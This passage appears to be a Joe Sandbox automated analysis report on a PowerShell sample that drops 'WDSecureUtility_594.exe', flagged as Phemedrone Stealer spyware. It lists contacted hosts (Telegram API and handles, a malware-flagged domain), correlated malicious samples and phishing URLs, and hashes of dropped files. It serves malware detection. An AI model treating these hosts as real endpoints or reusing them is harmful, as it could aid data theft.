                  https://t.me/TheDyerWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://apitradingview.compowershell.exe, 00000000.00000002.1559813700.000001B18165B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.teleWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://get.geojs.ioWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://api.telegram.orgWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://t.me/webster480WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  		api.telegram.orgUnited Kingdom
                  		62041TELEGRAMRUtrue
                  86.104.15.60
                  		apitradingview.comNetherlands
                  		44901BELCLOUDBGfalse
                  172.67.70.233
                  		get.geojs.ioUnited States
                  		13335CLOUDFLARENETUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1548283
                  Start date and time:2024-11-04 09:41:19 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:upd.ps1
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winPS1@4/8@3/3
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 8
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1
                  • Stop behavior analysis, all processes terminated

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: upd.ps1

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:42:16API Interceptor45x Sleep call for process: powershell.exe modified
                  03:42:24API Interceptor18x Sleep call for process: WDSecureUtility_594.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                    DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                      nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                        pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      86.104.15.60Lokalkendskab.exeGet hashmaliciousGuLoaderBrowse
                                      • park-your-track.com/uXIrhGiBMIRv32.bin
                                      #U00d6deme makbuzu2.exeGet hashmaliciousGuLoaderBrowse
                                      • park-your-track.com/cQHyYR236.bin
                                      172.67.70.233DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                            https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                              https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                  https://g.page/r/CbPyKO_ogGK3EAg/reviewGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    P09Qwe9fqsKdQIyTGnGxNs8xS[1]Get hashmaliciousTycoon2FABrowse
                                                      vm AUDIO_QzOXYQIfIQZ VOICE September 11th, 2024 attachment.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                        Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646fGet hashmaliciousHTMLPhisher, Tycoon2FABrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          get.geojs.ioWDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 172.67.70.233
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.0.100
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.0.100
                                                          http://braintumourresearch.orgGet hashmaliciousUnknownBrowse
                                                          • 104.26.1.100
                                                          https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 104.26.0.100
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                          • 172.67.70.233
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                                          • 104.26.1.100
                                                          apitradingview.comDBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 86.104.15.60
                                                          api.telegram.orgWDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUWDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 188.114.96.3
                                                          WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 172.67.70.233
                                                          EROctober 31, 2024_Amendment_for_J.thepautIyNURVhUTlVNUkFORE9NMTkjIw==-1.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.21.55.69
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          file.exeGet hashmaliciousLummaC, StealcBrowse
                                                          • 188.114.97.3
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          BELCLOUDBGDBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 86.104.15.60
                                                          rhqubIGcyN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Clipboard Hijacker, Cryptbot, MicroClip, Neoreklami, RedLineBrowse
                                                          • 185.244.181.140
                                                          jYDYjpSbvf.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, StealcBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Z2LPSpO1yU.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eWDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          givingbestthignswithgreatheatcaptialthingstodo.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Purchase order.vbsGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          :newads (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):240640
                                                          Entropy (8bit):5.163089509953704
                                                          Encrypted:false
                                                          SSDEEP:1536:BmDUeGs1J7fIwquWnkJwXkbLV6ZmB9IADS1u0TjfZ3LWj3Le5eRjIIVwObSqI+nU:MDx1J7fIwpq+8KAh3LAEctWO3/ET
                                                          MD5:0FF0576F91E4F548CA0D223462B2586C
                                                          SHA1:D9D79541127FEBDB03E0C0DE663D42B4B33FEAD9
                                                          SHA-256:10273F0F52AECAAF9688F7BBC250BC1E75C3CFD054831C78FFFADADFB65D07A6
                                                          SHA-512:0C41762E9967AAC27F9D064EF89E6C8CC145D906FCFA1F6420ADD3BC13E0B8D4C6FE62E828AEC555722F90A98B7B6CBA73EC3799EBF1D0A40FAB3F191BDAD1E2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g..............0.................. ........@.. ....................................`.....................................O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H............B......[.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .s.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{....*V.(......}......}....*.0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. (... )UU.

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WDSecureUtility_594.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1498
                                                          Entropy (8bit):5.364175471524945
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs6sXE4NpYE4KD:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIo
                                                          MD5:118C0052FF32427F2D565A3D20BCAA00
                                                          SHA1:016EF00DEC0507D0B7B776CF9FC45046CD90BDBF
                                                          SHA-256:2AC954DFE8E43E443E582F59101F6D897D3605667BB863920FE7AEA5A101267C
                                                          SHA-512:8542C68B102DBEBF021D15C64D4DECED52AD95898BFC1390F8B9AD6E2D65E33D48F1924D526B66F58CB6CB136847BAB28B5B1D706675556B925C9D8F26A25517
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:@...e.................................X..............@..........

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arohrkmb.100.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcxqzjsn.i2z.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.704748984896851
                                                          Encrypted:false
                                                          SSDEEP:96:tolrCNP8HkvhkvCCtPnm1dXjHZc61dXEHZcD:tolGPYPnm1Xc61UcD
                                                          MD5:3822C3C37B0981367966D5383B738BA5
                                                          SHA1:945C18F1E57900C6E87D3A0255A24C47660943DC
                                                          SHA-256:F854991FFBF84F94F74507C3ED1872F489B921FFF1C0F9154B82F2849AFF00CC
                                                          SHA-512:75557C00FC507D45F0245802A4DC2B17D9B73F8D4DF24DB23C146F21D013ADA5A6CDA119CCF1280CE2E04D6A1A8653202D5DD4C2BF4160EA78A983B373EEA061
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd......r....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......m......!r........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BdYFE..........................d...A.p.p.D.a.t.a...B.V.1.....dYDE..Roaming.@......EW)BdYDE..........................Z`..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BdYAE............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BdYAE............................F.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BdYAE....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BdYAE....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BdYGE.....0..........

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WRCJPH4CTLOIH0YGJGT0.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.704748984896851
